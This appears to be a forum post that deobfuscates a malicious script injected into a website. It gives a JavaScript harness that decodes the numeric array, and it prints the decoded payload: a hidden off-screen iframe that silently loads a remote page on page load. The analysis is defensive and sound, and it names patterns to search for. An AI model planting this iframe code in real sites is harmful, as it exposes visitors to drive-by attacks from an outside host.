With the first bit, the try statement - it's code designed to fail (`prototype` isn't defined as a variable, so `1-prototype` throws), so the catch block steps in and sets x = 2.
After I pasted the code, there appeared to be two commas missing from between elements in the array - either that or 2 numbers were broken in half. So I'm still not sure that I've guessed correctly.
After some mind-numbing tracing, I got to a situation where the s in the e(s) statement is equal to:
"
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999e
(9ggsk/tpd!>! iurq;-0msoed.dpfbrjpl/ec0n_jo,qin#<jdsn,je>!%gskJe%<epavncou,cpbz/_qqcoeAijje)ggsk*<~9ujobpx,poj
`c"<hqlCcc="
Which looks like junk to me, so I'll try again to paste the array correctly.
Wouldn't you just love to throttle the sod that did this..
EDIT: Had another try - I had inserted extra commas the first time round - this was clearly wrong. This time I removed the spaces, wrapped it into a function and removed the final eval, outputting instead to the console. Here's the re-written code and the final payload. Enjoy!
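/**
 * Analysis harness: decodes the injected script's numeric array into text and
 * prints it, without ever executing the decoded text.
 *
 * The original injected code hid its intent behind a few tricks, all of which
 * are replaced here by their plain equivalents:
 *   - `try{1-prototype;}catch(asd){x=2;}` : a statement that always throws, so
 *     the real work only starts from the catch block (presumably to trip up
 *     simple emulators/scanners; the intent is not confirmed by the sample).
 *   - `window["eva" + "l"]` and `String["fromChar" + "Code"]` : sensitive names
 *     assembled from string fragments instead of being written out.
 *   - `e("j%3")` : the per-character key computed through eval.
 *   - `288-5+5-i>0` : the array length written as arithmetic.
 * Those same patterns (a large numeric array, a fromCharCode loop, a
 * string-built lookup on `window`) are what to search for when checking other
 * files on a compromised site.
 *
 * This version calls no eval, creates no globals and does not need `window`,
 * so it can be run outside a browser.
 *
 * @returns {string} The decoded payload source (also written to the console).
 */
function injectedCrap()
{
  // Encoded payload, values copied unchanged from the injected script.
  const f = [
    4, 0, 91, 108, 100, 88, 107, 95, 100, 101, 22, 91, 105, 99, 54, 91, 90,
    29, 32, 22, 112, 4, 0, 107, 88, 104, 21, 96, 92, 103, 100, 22, 50, 23,
    90, 100, 90, 107, 98, 92, 100, 105, 37, 89, 103, 92, 87, 105, 92, 59,
    97, 92, 99, 90, 101, 106, 29, 30, 95, 91, 105, 87, 98, 92, 29, 30, 50,
    3, -1, 96, 92, 103, 100, 36, 104, 107, 111, 97, 92, 36, 101, 102, 105,
    94, 107, 95, 100, 101, 51, 28, 88, 88, 104, 102, 98, 106, 107, 91, 28,
    50, 3, -1, 96, 92, 103, 100, 36, 104, 107, 111, 97, 92, 36, 105, 102,
    102, 50, 30, 35, 46, 48, 47, 90, 100, 29, 48, 4, 0, 94, 93, 104, 98,
    37, 105, 105, 112, 98, 90, 37, 98, 90, 93, 106, 50, 30, 35, 46, 48, 47,
    90, 100, 29, 48, 4, 0, 94, 93, 104, 98, 37, 105, 103, 90, 22, 21, 52, 22,
    23, 95, 106, 105, 103, 48, 36, 38, 98, 106, 101, 90, 91, 36, 89, 103,
    92, 87, 105, 96, 101, 99, 37, 90, 90, 38, 99, 86, 96, 100, 35, 103, 94,
    101, 25, 49, 2, 1, 95, 91, 105, 99, 35, 96, 90, 21, 52, 22, 28, 93, 104,
    98, 64, 90, 28, 50, 3, -1, 91, 101, 88, 108, 99, 90, 101, 106, 35, 89,
    101, 89, 112, 36, 86, 103, 102, 90, 101, 90, 56, 95, 95, 97, 91, 30, 94,
    93, 104, 98, 32, 49, 2, 1, 115, 48, 4, 0, 108, 96, 100, 89, 102, 109, 35,
    102, 100, 97, 102, 87, 89, 23, 51, 21, 93, 104, 98, 56, 90, 89, 50, 3, -1,
  ];

  // Each character is stored as (charCode - 9 - index % 3); add both back.
  // Iterating over f.length (288 entries) replaces the hard-coded loop bound.
  let s = "";
  for (let i = 0; i < f.length; i += 1) {
    s += String.fromCharCode(f[i] + 9 + (i % 3));
  }

  // Print only. The decoded text is hostile and must never be evaluated.
  console.log(s);
  return s;
}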
Which, when all is done and dusted evaluates to this nasty piece of work:
// Decoded payload, reproduced for analysis only. Per the post, the injected
// script originally passed this text to eval instead of printing it.
// frmAdd builds an iframe, moves it off-screen and points it at a remote page.
function frmAdd() {
var ifrm = document.createElement('iframe');
// Absolute positioning at -999em top/left puts the frame outside the visible page area.
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
// The frame loads this remote URL; what main.php serves is not shown on this page.
ifrm.src = "http://lundf-creation.de/main.php";
// Fixed element id: a usable string to search for when checking pages for this injection.
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
// Runs frmAdd once the page has loaded; assigning window.onload also replaces
// any handler previously stored in that property.
window.onload = frmAdd;
Dirty elephanters!
modified 30-Jul-12 7:59am.